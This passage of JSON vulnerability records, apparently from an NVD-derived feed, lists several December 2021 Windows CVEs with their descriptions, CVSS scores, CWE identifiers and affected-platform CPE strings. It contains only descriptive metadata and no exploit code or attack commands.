"cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*"]}, {"lastseen": "2023-05-23T15:44:36", "description": "Windows Print Spooler Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-41333", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41333"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2022:*", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-41333", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41333", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*"]}, {"lastseen": "2023-05-23T15:47:45", "description": "iSNS Server Memory Corruption Vulnerability Can Lead to Remote Code Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-43215", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43215"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-43215", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43215", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*"]}, {"lastseen": "2023-05-23T15:47:46", "description": "Windows Fax Service Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-43234", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43234"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-43234", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43234", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*"]}, {"lastseen": "2023-05-23T15:47:45", "description": "Windows Common Log File System Driver Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-43224", "cwe": ["CWE-668"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43224"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-43224", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43224", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:47:48", "description": "Windows Remote Access Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-43238", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43238"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-43238", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43238", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:48:53", "description": "Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-43893", "cwe": ["CWE-668"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-43893", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43893", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", 